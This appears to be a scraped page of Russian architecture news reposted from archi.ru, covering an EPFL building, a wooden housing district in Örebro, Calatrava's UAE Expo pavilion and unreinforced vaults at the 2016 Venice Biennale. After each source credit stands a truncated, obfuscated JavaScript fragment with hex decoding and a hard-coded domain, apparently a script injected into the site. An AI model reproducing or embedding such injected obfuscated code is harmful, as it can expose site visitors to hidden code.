Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны. План © Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны. План © Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны. План © Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны. План © Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны. План © Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны. План © Dominique Perrault Architecture / Adagp открыть большое изображение

Источник: archi.ru

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

 
15.06.2016 «Деревянный город»

Архитектурное бюро C.F. Møller выиграло конкурс на строительство квартала из средневысотных деревянных домов в шведском Эребру.

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение


Конкурс, организованный муниципалитетом города Эребру и Шведской ассоциацией архитекторов, изначально имел амбициозную и несколько утопичную цель – создать экологичный жилой квартал, стимулирующий развитие социальных связей внутри современного города. Архитекторы и ландшафтные дизайнеры C.F. Møller назвали свой проект «Деревянный город» (Trästad) и предложили решить проблему при помощи тесного взаимодействия с природой и активного использования дерева не только в отделке, но и в конструкциях домов.

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение


Под строительство отвели участок площадью около 18 000 м2 в районе Эрнсру, всего в полутора километрах от центра старого города. Среди безусловных достоинств нового квартала – близость к реке Свартон и обилие зелени вокруг. В результате, проект объединит несколько разновысотных жилых домов (всего предусмотрено около 200 различных жилых модулей) с характерным намеком на двускатные кровли в верхней части. Поставлены они будут свободно, почти хаотично, образуя множество разнообразных общественных зон и дорожек. Основной же путь прорежет квартал насквозь и соединит главный променад вдоль набережной с соседними районами.

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение


Но тесное взаимопроникновение городской ткани и природы подчеркивается не только парковым окружением домов. В качестве конструктивного и отделочного материала архитекторы логично, но довольно смело выбрали «социально близкое» дерево, отметив также в качестве плюсов возможность повторного использования материала, разнообразие фактур и цветовых решений, минимальное количество вредных выбросов в атмосферу и энергоэффективность подобных домов.

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение


Начало строительства запланировано на зиму 2017/2018, а уже к концу 2019 года работы должны быть завершены. Узнать больше о конкурсе и посмотреть предложения всех 5 финалистов можно на сайтемуниципалитета Эребру.

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Деревянный город в Эрнсру © C.F. Møller Architects

Деревянный город в Эрнсру © C.F. Møller Architects открыть большое изображение

Источник: archi.ru

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

 
08.06.2016 Архитектурная орнитология

Сантьяго Калатрава воплотит «дерзкий и смелый дух» ОАЭ в их национальном павильоне для выставки Экспо-2020 в Дубае.

Проект Сантьяго Калатравы для национального павильона ОАЭ, прообразом которого послужило крыло птицы, был выбран из девяти архитектурных предложений. Эта постройка появится на Всемирной выставке Экспо-2020, которая пройдёт с 20 октября 2020 года по 10 апреля 2021 года в Дубае. Как признаётся архитектор, на создание этого павильона его вдохновил образ сокола в полёте. Калатрава не в первый раз обращается к миру крылатых в поиске подходящей формы: например, транспортный терминал ВТЦ в Нью-Йорке, строительство которого закончилось всего несколько месяцев назад, похож на взлетающего голубя.

Павильон ОАЭ для Экспо-2020 © Santiago Calatrava LLC

Павильон ОАЭ для Экспо-2020 © Santiago Calatrava LLC открыть большое изображение

Павильон ОАЭ для Экспо-2020 © Santiago Calatrava LLC

Павильон ОАЭ для Экспо-2020 © Santiago Calatrava LLC открыть большое изображение

В павильоне Эмиратов на площади 15 тыс. м2 разместятся выставочное пространство, конференц-зал, зоны с кафе и VIP-залы. Кроме того, на визуализациях можно увидеть огромные экраны для демонстрации видеоматериалов и крытые террасы. «Финальный вариант проекта станет символом смелого и дерзкого духа Арабских Эмиратов», – уверен архитектор.
Павильон ОАЭ для Экспо-2020 © Santiago Calatrava LLC

Павильон ОАЭ для Экспо-2020 © Santiago Calatrava LLC открыть большое изображение

Сантьяго Калатрава не единственный «звёздный» архитектор, приглашённый для участия во всемирной выставке: помимо него в списке значатся такие бюро, как Foster + Partners, BIG and Grimshaw, а генеральный план для Экспо-2020 разработало международная фирма HOK. Известно, что вся экспозиция займёт территорию площадью 2 км2, и павильон ОАЭ разместится в самом её центре.
Павильон ОАЭ для Экспо-2020 © Santiago Calatrava LLC

Павильон ОАЭ для Экспо-2020 © Santiago Calatrava LLC открыть большое изображение

Выставка пролится полгода и станет общемировой сценой для демонстрации новаторских идей в архитектуре и культуре. Ожидается, что за время её работы Экспо-2020 посетят 25 млн человек. Тема Всемирной выставке выражена в слогане «Соединяя умы, создаем будущее», ключевой задачей объявлен поиск «устойчивых» решений для глобальных проблем. Источник: archi.ru

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

 
04.06.2016 Биеннале: конструкции

Одной из тем биеннале стали экономные современные конструкции, основанные на переосмыслении традиционных инженерных техник. Начинаем рассказывать о них, показываем пока две: поиски швейцарского ETH и кирпичную конструкцию Солано Бенитеса, награжденную «Львом».

Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение

Швейцарская высшая техническая школа
Block Research Group, ETH Zurich
and Ochsendorf, DeJong & Block with Escobedo Group

 

Инсталляции Beyond Bending (beyond the slab, beyond the dome, beyond free-form...), чьи названия апеллируют к биеннале Аарона Бецки (Out There: Architecture Beyond Building) и переводятся примерно как «за поворотом / изгибом» и «за слябом / плоским перекрытием», апеллируют к логике самонапряженных конструкций. Они демонстрируют изыскания BRG и ODB в области переосмысления традиционных и сравнительно недорогих техник свода и ребер жёсткости с помощью современных компьютерных технологий. Центр зала занимает гигантский свод несимметричной кривизны, прорезанный крупными дырами, пропускающими сквозь себя колонны Кордери. Свод выполнен из юрского известняка и совершенно не армирован, а держится исключительно на распоре клиновидных камней, форма каждого из которых была просчитана на компьютерной модели. Затем конструкцию собрали на деревянной опалубке, предварительно протестировав: собрав и разобрав её на месте. Фрагмент ролика с выставки, рассказывающего об этом, можно увидеть в нашем видео:

 

 

Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Фракталы, чья форма ложится в основу расчётов. Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Фракталы, чья форма ложится в основу расчётов. Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение

Лишнюю сталь можно удалить, утверждают авторы, сберечь таким образом природные ресурсы, а использовать «скромные» материалы, такие как кирпич и камень. Арка с ребром жесткости – более эффективный строительный приём, чем изогнутая балка – утверждают авторы, и показывают вариант парусного свода с ребрами. Такие конструкции прекрасно выглядят, меньше стоят и легче весят, чем традиционное бетонное перекрытие.

Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение

Авторы также показывают варианты неармированных бетонных плит, облегченных множеством каверн, просчитанных исходя из логики и геометрии нервюрного свода. Распор множества ребер выводится вовне и перераспределяется на соседние элементы. Такая плита требует сложной, двухсторонней матрицы для отливки, но при многократном использовании ее дороговизна окупается и, кроме того, данная технологиясохраняет природные ресурсы – бетона для производства требуется на 70% меньше, чем для обычного бетонного перекрытия.

Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Плита, отлитая из бетона. Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Плита, отлитая из бетона. Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Изготовление формы для плиты из бетона. Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Изготовление формы для плиты из бетона. Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру
Биеннале 2016, экспозиция Аравены: проект BRG ETH, ODB и EG. Фотография © Юлия Тарабарина, Архи.ру открыть большое изображение
***


Солано Бенитес
Арка парагвайского бюро Солано Бенитеса, получившая «Золотого льва» за лучший проект основной экспозиции, и значит, лучше всего раскрывшая тему Аравены «Репортаж с фронта», встречает входящих в главный павильона биеннале в Джардини. Это ажурная конструкция из кирпича на бетонной основе, выполненная на опалубке – опалубка демонстрируется здесь же на стене, но не армированная. Её устойчивость достигается за счёт конструкции, подобной конструкциям Фуллера и Шухова, которые, однако, в описаниях не фигурируют никак. «Кирпич древний, простой в изготовлении и дешевый материал, дома из него можно строить и в маргинальных зонах» – пишет Аравена в своём пояснении к проекту Бенитеса. Подразумевается, что подобными конструкциями можно сравнительно дешево перекрывать достаточно обширные пространства, причём опытный инструктор может научить строителей средней квалификации.

Источник: archi.ru

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

 
<< Первая < Предыдущая 21 22 23 24 25 26 27 28 29 30 Следующая > Последняя >>

Страница 25 из 92